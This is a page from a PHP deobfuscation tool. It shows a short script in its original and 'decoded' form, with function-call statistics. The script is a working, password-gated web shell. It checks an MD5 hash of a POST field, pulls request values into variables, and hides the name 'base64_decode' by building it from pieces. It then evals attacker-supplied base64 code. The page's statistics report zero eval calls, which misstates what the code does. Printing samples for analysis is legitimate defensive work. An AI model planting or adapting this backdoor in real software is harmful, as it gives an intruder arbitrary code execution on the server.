Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php if(!isset($_POST['upw'])||md5($_POST['upw'])!='f2c5b4539151a70a5c825a6eafd328a4')exi..
Decoded Output download
<?php if(!isset($_POST['upw'])||md5($_POST['upw'])!='f2c5b4539151a70a5c825a6eafd328a4')exit; $_REQUEST=array_merge($_GET,$_POST);foreach($_REQUEST as $k=>$v){if(!isset($$k)){$$k=$v;}} $c=isset($c)? $c:''; $e='code';$a='ba';$z='_';$a.='se';$b=(100-36);$d='de';$a=$a.$b.$z.$d.$e;eval(((strlen($c)>10)? $a($c): "echo '';"));?>
Did this file decode correctly?
Original Code
<?php if(!isset($_POST['upw'])||md5($_POST['upw'])!='f2c5b4539151a70a5c825a6eafd328a4')exit; $_REQUEST=array_merge($_GET,$_POST);foreach($_REQUEST as $k=>$v){if(!isset($$k)){$$k=$v;}} $c=isset($c)? $c:''; $e='code';$a='ba';$z='_';$a.='se';$b=(100-36);$d='de';$a=$a.$b.$z.$d.$e;eval(((strlen($c)>10)? $a($c): "echo '';"));?>
Function Calls
| md5 | 1 |
| array_merge | 1 |
Stats
| MD5 | 6c683accef16ba3e6005956198e7891a |
| Eval Count | 0 |
| Decode Time | 104 ms |